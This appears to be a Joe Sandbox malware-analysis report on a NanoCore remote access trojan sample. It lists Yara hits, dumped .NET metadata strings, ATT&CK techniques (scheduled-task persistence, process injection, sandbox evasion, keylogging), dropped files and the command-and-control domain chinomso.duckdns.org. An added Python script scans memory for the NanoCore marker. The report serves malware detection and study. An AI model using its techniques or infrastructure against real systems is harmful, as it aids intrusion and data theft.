      Source: Yara match File source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPE
      Source: Yara match File source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPE
      Source: Yara match File source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPE
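      The Yara matches above were raised on memory dumps and on PE images carved from those dumps, and the Remote Access section below attributes the NanoCore.ClientPluginHost name to the same regions. The following Python is an added example, not part of the report and not Joe Sandbox or NanoCore code, of the minimum a memory-triage script needs in order to reproduce that finding on its own dumps: the marker is searched in UTF-8, which is how .NET type and member names sit in the assembly's metadata string heap (the run quoted in the Remote Access section), and in UTF-16LE, which is how the same names appear once the runtime has built System.String objects from them. The three byte strings stood in for dumped regions are constructed by hand, not taken from the sample.

```python
"""Added example (not part of the Joe Sandbox report, and not Joe Sandbox or
NanoCore code): scan memory regions for the NanoCore plugin-host marker in both
the UTF-8 form used by .NET metadata and the UTF-16LE form of runtime strings.

Assumed (constructed for this example): the byte strings in SAMPLE_REGIONS
stand in for dumped memory regions; they are hand-built, not from the sample.
"""
MARKERS = ("NanoCore.ClientPluginHost", "ClientPlugin.dll")
ENCODINGS = ("utf-8", "utf-16-le")


def scan_region(data, markers=MARKERS):
    """Return sorted (offset, encoding, marker) tuples for every occurrence."""
    hits = []
    for marker in markers:
        for encoding in ENCODINGS:
            needle = marker.encode(encoding)
            start = data.find(needle)
            while start != -1:
                hits.append((start, encoding, marker))
                start = data.find(needle, start + 1)
    return sorted(hits)


def is_nanocore_region(data):
    """Only the plugin-host interface name is treated as a verdict; the bare
    DLL name is corroboration, since other assemblies could carry it."""
    return any(marker == "NanoCore.ClientPluginHost" for _, _, marker in scan_region(data))


def scan_regions(regions):
    """regions: {name: bytes} -> {name: hits}, keeping only regions that hit."""
    result = {}
    for name, data in regions.items():
        hits = scan_region(data)
        if hits:
            result[name] = hits
    return result


# Constructed regions: a metadata-string-heap-like fragment (UTF-8, NUL
# separated names), a UTF-16LE instance surrounded by padding, and a control
# that mentions NanoCore without carrying either marker.
SAMPLE_REGIONS = {
    "metadata": b"\x00<Module>\x00mscorlib\x00NanoCore.ClientPluginHost\x00ClientPlugin.dll\x00",
    "heap": b"\x00" * 8 + "NanoCore.ClientPluginHost".encode("utf-16-le") + b"\x00" * 8,
    "control": b"analysis report about NanoCore, no marker here",
}

if __name__ == "__main__":
    for name, hits in scan_regions(SAMPLE_REGIONS).items():
        verdict = "NanoCore" if is_nanocore_region(SAMPLE_REGIONS[name]) else "corroboration only"
        print(name, hits, verdict)
```

      The UTF-8 hits come back at the byte offsets of the names inside the NUL-separated heap fragment, the UTF-16LE hit at the start of the padded string, and the control region yields nothing even though it contains the word NanoCore. For real dumps, feed each region's bytes in as read from the sandbox or from a process-memory acquisition; the offsets reported are relative to the start of the region, so add the region's base address to map a hit back to the virtual address in the dump name.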

      Remote Access Functionality:

      Detected Nanocore Rat
      Source: nanocore.exe, 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exe String found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exe, 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: nanocore.exe, 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, String found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, String found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exe, String found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exe, 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: dhcpmon.exe, String found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: dhcpmon.exe, 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, String found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, String found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RAT

      Mitre Att&ck Matrix

      Techniques by tactic (superscript counts as shown on the page):

      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
      Execution: Native API 1; Scheduled Task/Job 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
      Persistence: Scheduled Task/Job 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
      Privilege Escalation: Process Injection 212; Scheduled Task/Job 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
      Defense Evasion: Disable or Modify Tools 1; Deobfuscate/Decode Files or Information 11; Obfuscated Files or Information 2; Software Packing 41; Masquerading 2; Virtualization/Sandbox Evasion 31; Process Injection 212; Hidden Files and Directories 1
      Credential Access: Input Capture 21; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
      Discovery: System Time Discovery 1; File and Directory Discovery 2; System Information Discovery 24; Security Software Discovery 131; Process Discovery 2; Virtualization/Sandbox Evasion 31; Application Window Discovery 1; Network Service Scanning
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
      Collection: Archive Collected Data 11; Input Capture 21; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
      Command and Control: Encrypted Channel 1; Non-Standard Port 1; Remote Access Software 1; Non-Application Layer Protocol 1; Application Layer Protocol 21; Multiband Communication; Commonly Used Port; Application Layer Protocol
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

      Behavior Graph

      Behavior Graph ID: 384377, Sample: nanocore.exe, Start date: 09/04/2021, Architecture: WINDOWS, Score: 100

      Start
      • DNS/IP: chinomso.duckdns.org
      • Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
      • nanocore.exe (18) started
        • DNS/IP: 192.168.2.1 (unknown, unknown)
        • Dropped: C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32
        • Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Uses schtasks.exe or at.exe to add and modify task schedules; Contains functionality to prevent local Windows debugging
        • nanocore.exe (1 12) started
          • DNS/IP: chinomso.duckdns.org 213.208.152.210, ports 49740, 49746, 49747, NEXTLAYER-ASAT, Austria
          • Dropped: C:\Program Files (x86)\...\dhcpmon.exe, PE32; C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859; C:\Users\user\AppData\Local\...\tmp38C1.tmp, XML; C:\...\dhcpmon.exe:Zone.Identifier, ASCII
          • Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
          • schtasks.exe (1) started, which started conhost.exe
          • schtasks.exe (1) started, which started conhost.exe
      • dhcpmon.exe (16) started
        • Dropped: C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32
        • Signature: Maps a DLL or memory area into another process
        • dhcpmon.exe (3) started
          • Dropped: C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII
      • nanocore.exe (16) started
        • Dropped: C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32
        • nanocore.exe (3) started
          • Dropped: C:\Users\user\AppData\...\nanocore.exe.log, ASCII
      • dhcpmon.exe (16) started
        • Dropped: C:\Users\user\AppData\...\4rmzuajr4dtt.dll, PE32
        • dhcpmon.exe (2) started

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      nanocore.exe | 21% | Virustotal |
      nanocore.exe | 34% | ReversingLabs | Win32.Trojan.Predator

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 34% | ReversingLabs | Win32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dll | 24% | ReversingLabs | Win32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll | 24% | ReversingLabs | Win32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll | 24% | ReversingLabs | Win32.Trojan.Predator
      C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dll | 24% | ReversingLabs | Win32.Trojan.Predator

      Unpacked PE Files

      Source | Detection | Scanner | Label
      11.2.dhcpmon.exe.4920000.9.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      13.2.dhcpmon.exe.400000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      10.2.nanocore.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      10.2.nanocore.exe.49c0000.9.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      2.2.nanocore.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      2.2.nanocore.exe.4a90000.8.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      13.2.dhcpmon.exe.4fa0000.9.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      2.2.nanocore.exe.58b0000.12.unpack | 100% | Avira | TR/NanoCore.fadte
      2.1.nanocore.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      1.2.nanocore.exe.6fc70000.6.unpack | 100% | Avira | HEUR/AGEN.1131513
      8.2.nanocore.exe.6eec0000.6.unpack | 100% | Avira | HEUR/AGEN.1131513
      9.2.dhcpmon.exe.6eda0000.6.unpack | 100% | Avira | HEUR/AGEN.1131513
      11.1.dhcpmon.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      12.2.dhcpmon.exe.6f650000.6.unpack | 100% | Avira | HEUR/AGEN.1131513
      11.2.dhcpmon.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      10.1.nanocore.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
      13.1.dhcpmon.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

      Domains

      Source | Detection | Scanner | Label
      chinomso.duckdns.org | 9% | Virustotal |

      URLs

      Source | Detection | Scanner | Label
      chinomso.duckdns.org | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      chinomso.duckdns.org | 213.208.152.210 | true | true | | unknown

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      chinomso.duckdns.org | true | Avira URL Cloud: safe | unknown

      Contacted IPs


      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      213.208.152.210 | chinomso.duckdns.org | Austria | 1764 | NEXTLAYER-ASAT | true

      Private

      IP
      192.168.2.1

      General Information

      Joe Sandbox Version: 31.0.0 Emerald
      Analysis ID: 384377
      Start date: 09.04.2021
      Start time: 01:07:10
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 13m 3s
      Hypervisor based Inspection enabled: false
      Report type: full
      Sample file name: nanocore.exe
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of new started processes analysed: 28
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal100.troj.evad.winEXE@18/20@24/2
      EGA Information: Failed
      HDC Information:
